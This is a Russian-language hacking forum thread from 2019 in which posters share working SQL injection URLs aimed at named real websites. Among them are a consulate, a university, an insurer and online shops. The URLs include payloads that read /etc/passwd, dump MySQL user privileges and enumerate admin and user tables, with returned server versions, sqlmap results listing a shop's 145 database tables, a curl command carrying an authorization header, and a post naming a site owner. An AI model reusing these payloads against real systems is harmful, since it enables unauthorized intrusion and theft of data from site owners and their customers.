ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
21.08.2019, 23:47
|
|
Guest
Сообщений: n/a
Провел на форуме:
92829
Репутация:
212
|
|
Код:
Code:
www.all-guitar-chords.com/topic.php?id=-4794' union all select concat_ws(0x23,version(),database(),user(),load_file('/etc/passwd')),2,3,4,5,6,7,8,9,10,group_concat(concat_ws(0x3a3a,host,user,file_priv,insert_priv,update_priv) SEPARATOR " ") FROM mysql.user --%20
5.5.52-MariaDB
Код:
Code:
https://www.txdirectory.com/online/abc/detail.php?id=217 union select concat_ws(0x3a3a,version(),user(),database(),group_concat(table_name separator " ")),2,3,4 from information_schema.tables where table_schema=database() --%20
5.5.61-0ubuntu0.14.04.1-log
Код:
Code:
https://www.hotelnewsresource.com/go.php?id=-1298989163' or (select count(*) from (select 1 union select 2 union select 3)x group by concat(substring(concat_ws(0x23,version(),(select schema_name from information_schema.schemata limit 3,1),(select file_priv from mysql.user where user='root' and host='localhost'),0x23), 1), floor(rand(0)*2))) --%20
5.5.60-MariaDB |
|
|
|
26.08.2019, 01:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
7175
Репутация:
8
|
|
|
|
|
|
26.08.2019, 02:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
7175
Репутация:
8
|
|
https://sarov.info Колючий Саров Яндекс ИКС (бывший тИЦ) 3600
Несколько SQL иньекций.
Первая:
Код:
Code:
https://sarov.info/phones/yp/index.php?cat=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3+--+1
admin_bbnews@192.168.1.17:5.6.38:admin_bbnews
Вторая:
Код:
Code:
curl https://sarov.info/bills/np/doubles.php --data "bill_id%5B1401653 and extractvalue(1,concat(0x3b,(select(version()))))%23%5D=on&delform=1" -H "Authorization: Basic a29sc2FyOmlsZW5hc2Fy"
XPATH syntax error: ';5.6.38'
Владелец ресурса, Кирилл Асташов aka BadBlock известный в Нижегородской области борец с экстремизмом в комментариях, с последующими заявлениями в центр "Э".
|
|
|
|
04.09.2019, 22:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
92829
Репутация:
212
|
|
Код:
Code:
https://www.6-movies.com/category.php?id=28 union select 1,2,concat_ws(0x3a3a,version(),user(),group_concat(column_name)),4,5,6,7 from information_schema.columns where table_name='chatusers' and table_schema='NauGerComDB2' --%20
5.5.55-0+deb8u1
Код:
Code:
www.nwu.edu.bd/news_details.php?id=-37 '/*!50000union*/ /*!50000select*/ concat_ws(0x2323,version(),group_concat(table_name)),2 from /*!50000information_schema.tables where table_schema='nwuedu_web'*/ --%20
5.6.41-84.1
Код:
Code:
www.tpmrotator.com/list.php?id=-2522' union select concat_ws(0x2323,version(),database(),user(),group_concat(table_name separator " ")) from information_schema.tables where table_schema=database() --%20
5.5.60-MariaDB
Код:
Code:
www.asfaa.org/members.php?id=-14 union select 1,concat_ws(0x23,@@hostname,@@version_compile_os,@@datadir,@@tmpdir,@@basedir),3,group_concat(table_name separator " ") from information_schema.tables where table_schema=database() --%20
5.6.36-82.0
Код:
Code:
https://www.testprepkart.com/sat/blog-single.php?id=-12' union select 1,group_concat(column_name separator " "),3,4,5,6,7,concat_ws(0x3a3a,version(),database(),user(),@@hostname,@@version_compile_os,@@datadir,@@tmpdir,@@basedir),9,10,11,12,13,14,15,16 from information_schema.columns where table_name='admin' and table_schema=database() --%20
5.6.38
Код:
Code:
https://www.nhe-group.com/category.php?id=-31 '/*!50000union*/ /*!50000select*/ 1,2,3,4,group_concat(column_name),6,7,8,concat_ws(0x2323,version(),user(),0x2323),10,11,12,13,14,15 from /*!50000information_schema.columns where table_schema='ibrahim2_nhegroup' and table_name='admins'*/ --%20
5.6.32-78.1
Код:
Code:
https://www.htrends.com/go.php?id=927823727' or (select count(*) from (select 1 union select 2 union select 3)b group by concat(mid(concat_ws(0x3a3a,version(),(select schema_name from information_schema.schemata limit 0,1)),1,63), floor(rand(0)*2))) --%20
5.5.60-MariaDB
Код:
Code:
www.consuladoportugalgoa.com/pages.php?id=-2 union select 1,concat_ws(0x2323,version(),user(),@@hostname,@@version_compile_os,@@datadir,@@tmpdir,@@basedir),group_concat(column_name),4,5,6 from information_schema.columns where table_schema='consulad_con_pc' and table_name='users'--%20
5.7.27
Код:
Code:
https://www.nitolinsurance.com/news_details.php?id=-1' union select 1,concat_ws(0x2323,version(),user(),database()),3,group_concat(column_name) from information_schema.columns where table_schema='nitolins_website' and table_name='admin' --%20
10.1.41-MariaDB
Код:
Code:
http://www.ssy.org/detail.php?id=-1' union select 1,concat_ws(0x2323,version(),user(),database()),3,group_concat(cast(table_name as char)),(select cast(schema_name as char) from information_schema.schemata limit 0,1),6,7,8,9,10,11,12,13 from information_schema.tables where table_schema='ssy_datassy' --%20
5.6.45
Код:
Code:
https://www.compassboxwhisky.com/blog/post-print.php?id=-19' union select 1,concat_ws(0x2323,version(),user()),3,4,5,(select file_priv from mysql.user where user='compassbox'),7,group_concat(table_name),9,10,11,12 from information_schema.tables where table_schema='compassbox' --%20
5.5.60-MariaDB
Код:
Code:
https://www.faithandpublicpolicy.org/news.php?id=-464' union select group_concat(table_name),concat_ws(0x2323,version(),user(),(select file_priv from mysql.user where user='webuser')),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.tables where table_schema='sys'--%20
5.7.25 |
|
|
|
07.09.2019, 23:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
328
Репутация:
0
|
|
Код:
Code:
http://www.ibins.ru/useful.php?id=-1%27union+select+1,version(),3,4,database()--+
version:
5.6.25-73.1
Код:
https://www.russianspares.com/products.php?cat=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--+
version
5.6.45
Код:
Code:
https://www.wjhy.com.hk/en/product_detail.php?id=25+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,VERSION(),18,19,20,21,22,23--+
version 5.5.40
|
|
|
|
03.10.2019, 14:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
61136
Репутация:
32
|
|
Фрагментированная sql injection в скрипте spartak bux, на нем работают не плохое проекты.
||extractvalue(1,concat(0x3a,(select @@version)))#
Список уязвимых сайтов: (можно найти еще)
Post запрос (для hack bar)
Сообщение от None
type_serf=1&nolimit=0&url=
http://site.ru&title=\
&description=
[SQL]
&url_banner=&plan=1000&timer=20&up_list=0&color=0& active=0&revisit=0&unic_ip=0&new_users=0&no_ref=0& sex_adv=0&to_ref=0&limit_d=0&limit_h=0&method_pay= 1 Для новичков
Сообщение от None
В заголовок ссылки: \
Описание ссылки: команды
|
|
|
|
29.10.2019, 22:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
56255
Репутация:
2
|
|
glassofvenice.com
интернет магазин
внутри много интересного.
Код:
Code:
https://www.glassofvenice.com/landingpages.php?lp=murano-glass-beads&filters=36_10_38
Parameter: lp (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: lp=murano-glass-beads' AND 5931=5931 AND 'HFLm'='HFLm&filters=36_10_38
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: lp=murano-glass-beads' AND (SELECT 2228 FROM(SELECT COUNT(*),CONCAT(0x717a6b7a71,(SELECT (ELT(2228=2228,1))),0x7171766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'rqhj'='rqhj&filters=36_10_38
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: lp=murano-glass-beads' AND SLEEP(5) AND 'AqWz'='AqWz&filters=36_10_38
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: lp=-8269' UNION ALL SELECT 53,53,53,53,53,53,CONCAT(0x717a6b7a71,0x4a61754d67545a515571454669416b6f567a4d68696c4c4b57546d4a4b4a434c7752545479434164,0x7171766b71),53,53-- lNAv&filters=36_10_38
---
web server operating system: Linux Debian 9.0 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0
Database: glassdb
[145 tables]
+----------------------------------------------------+
| address_book |
| address_format |
| admin |
| admin_files |
| admin_groups |
| admin_logs |
| affiliate_affiliate |
| affiliate_banners |
| affiliate_banners_history |
| affiliate_clickthroughs |
| affiliate_news |
| affiliate_news_contents |
| affiliate_newsletters |
| affiliate_payment |
| affiliate_payment_status |
| affiliate_payment_status_history |
| affiliate_sales |
| amzn_orders |
| amzn_orders_items |
| amzn_products |
| amzn_products_description |
| amzn_products_report |
| amzn_reviews |
| amzn_seller_feedbacks |
| banners |
| banners_history |
| cache |
| cache_filters |
| cart_reminder |
| catalog_product_entity |
| categories |
| categories_description |
| configuration |
| configuration_group |
| contrib_tracker |
| counter |
| counter_history |
| countries |
| coupon_email_track |
| coupon_gv_customer |
| coupon_gv_queue |
| coupon_redeem_track |
| coupons |
| coupons_description |
| currencies |
| customer_entity |
| customers |
| customers_basket |
| customers_basket_attributes |
| customers_basket_info |
| customers_info |
| customers_points_pending |
| customers_temp |
| directory_country |
| directory_country_region |
| dos_protect |
| eav_attribute |
| eav_attribute_option |
| eav_attribute_option_value |
| emails_templates |
| etsy_products |
| etsy_products_images |
| etsy_taxonomies |
| filter_product_options |
| filter_products_attributes |
| filter_products_options_values |
| filter_products_options_values_to_products_options |
| geo_zones |
| giftwrap_options |
| google_checkout |
| google_configuration |
| google_orders |
| headertags |
| headertags_cache |
| headertags_default |
| headertags_pages |
| headertags_silo |
| inv_inventory_purchases |
| inv_model_xref |
| jet_orders |
| jet_orders_products |
| jet_returns |
| jet_returns_products |
| jet_returns_products_refund_amount |
| landing_pages |
| landing_pages_products |
| languages |
| mage_orders |
| mage_orders_products |
| manufacturers |
| manufacturers_info |
| newsletters |
| orders |
| orders_products |
| orders_products_attributes |
| orders_products_download |
| orders_status |
| orders_status_history |
| orders_status_history_transactions |
| orders_total |
| products |
| products_attributes |
| products_attributes_download |
| products_attributes_relations |
| products_attributes_sets |
| products_attributes_sets_elements |
| products_attributes_sets_to_products |
| products_description |
| products_extra_images |
| products_notifications |
| products_options |
| products_options_values |
| products_options_values_to_products_options |
| products_recommend |
| products_taxonomy_mapping |
| products_to_categories |
| products_variants |
| products_variants_images |
| products_variants_to_products_attributes |
| products_xsell |
| reviews |
| reviews_description |
| rma_return_reasons |
| scart |
| search_queries |
| search_queries_sorted |
| searchword_swap |
| sessions |
| sitemap_exclude |
| sliders |
| sliders_description |
| sliders_images |
| sliders_images_links |
| specials |
| tax_class |
| tax_rates |
| visitor |
| visual_verify_code |
| whos_online |
| wishlists |
| wishlists_products |
| wm_products |
| ws_products |
| zones |
| zones_to_geo_zones |
+----------------------------------------------------+
|
|
|
|
30.10.2019, 01:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
96779
Репутация:
5
|
|
Сообщение от RWD
RWD said:
↑
glassofvenice.com
интернет магазин
внутри много интересного.
Код:
Code:
https://www.glassofvenice.com/landingpages.php?lp=murano-glass-beads&filters=36_10_38
Parameter: lp (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: lp=murano-glass-beads' AND 5931=5931 AND 'HFLm'='HFLm&filters=36_10_38
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: lp=murano-glass-beads' AND (SELECT 2228 FROM(SELECT COUNT(*),CONCAT(0x717a6b7a71,(SELECT (ELT(2228=2228,1))),0x7171766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'rqhj'='rqhj&filters=36_10_38
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: lp=murano-glass-beads' AND SLEEP(5) AND 'AqWz'='AqWz&filters=36_10_38
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: lp=-8269' UNION ALL SELECT 53,53,53,53,53,53,CONCAT(0x717a6b7a71,0x4a61754d67545a515571454669416b6f567a4d68696c4c4b57546d4a4b4a434c7752545479434164,0x7171766b71),53,53-- lNAv&filters=36_10_38
---
web server operating system: Linux Debian 9.0 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0
Database: glassdb
[145 tables]
+----------------------------------------------------+
| address_book |
| address_format |
| admin |
| admin_files |
| admin_groups |
| admin_logs |
| affiliate_affiliate |
| affiliate_banners |
| affiliate_banners_history |
| affiliate_clickthroughs |
| affiliate_news |
| affiliate_news_contents |
| affiliate_newsletters |
| affiliate_payment |
| affiliate_payment_status |
| affiliate_payment_status_history |
| affiliate_sales |
| amzn_orders |
| amzn_orders_items |
| amzn_products |
| amzn_products_description |
| amzn_products_report |
| amzn_reviews |
| amzn_seller_feedbacks |
| banners |
| banners_history |
| cache |
| cache_filters |
| cart_reminder |
| catalog_product_entity |
| categories |
| categories_description |
| configuration |
| configuration_group |
| contrib_tracker |
| counter |
| counter_history |
| countries |
| coupon_email_track |
| coupon_gv_customer |
| coupon_gv_queue |
| coupon_redeem_track |
| coupons |
| coupons_description |
| currencies |
| customer_entity |
| customers |
| customers_basket |
| customers_basket_attributes |
| customers_basket_info |
| customers_info |
| customers_points_pending |
| customers_temp |
| directory_country |
| directory_country_region |
| dos_protect |
| eav_attribute |
| eav_attribute_option |
| eav_attribute_option_value |
| emails_templates |
| etsy_products |
| etsy_products_images |
| etsy_taxonomies |
| filter_product_options |
| filter_products_attributes |
| filter_products_options_values |
| filter_products_options_values_to_products_options |
| geo_zones |
| giftwrap_options |
| google_checkout |
| google_configuration |
| google_orders |
| headertags |
| headertags_cache |
| headertags_default |
| headertags_pages |
| headertags_silo |
| inv_inventory_purchases |
| inv_model_xref |
| jet_orders |
| jet_orders_products |
| jet_returns |
| jet_returns_products |
| jet_returns_products_refund_amount |
| landing_pages |
| landing_pages_products |
| languages |
| mage_orders |
| mage_orders_products |
| manufacturers |
| manufacturers_info |
| newsletters |
| orders |
| orders_products |
| orders_products_attributes |
| orders_products_download |
| orders_status |
| orders_status_history |
| orders_status_history_transactions |
| orders_total |
| products |
| products_attributes |
| products_attributes_download |
| products_attributes_relations |
| products_attributes_sets |
| products_attributes_sets_elements |
| products_attributes_sets_to_products |
| products_description |
| products_extra_images |
| products_notifications |
| products_options |
| products_options_values |
| products_options_values_to_products_options |
| products_recommend |
| products_taxonomy_mapping |
| products_to_categories |
| products_variants |
| products_variants_images |
| products_variants_to_products_attributes |
| products_xsell |
| reviews |
| reviews_description |
| rma_return_reasons |
| scart |
| search_queries |
| search_queries_sorted |
| searchword_swap |
| sessions |
| sitemap_exclude |
| sliders |
| sliders_description |
| sliders_images |
| sliders_images_links |
| specials |
| tax_class |
| tax_rates |
| visitor |
| visual_verify_code |
| whos_online |
| wishlists |
| wishlists_products |
| wm_products |
| ws_products |
| zones |
| zones_to_geo_zones |
+----------------------------------------------------+
бд шифрованая ?
|
|
|
|
30.10.2019, 23:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
56255
Репутация:
2
|
|
fantasycruncher.com
сайт спортивной тематики, права на чтение паролей MySQL и всех бд
Код:
Code:
https://www.fantasycruncher.com/cheatsheet.php?id=783b2c1a48b5b3e0
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=783b2c1a48b5b3e0' AND 1291=1291 AND 'YNvr'='YNvr
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=783b2c1a48b5b3e0' AND SLEEP(5) AND 'KAys'='KAys
---
web application technology: PHP 5.6.29, Nginx 1.10.1
back-end DBMS: MySQL 5 (MariaDB fork)
|
|
|
|
31.10.2019, 10:54
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
Код:
Code:
http://www.wakecamp.ru/index.php?action=item&id=54+and+1=0+union+distinct+select+1,2+
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид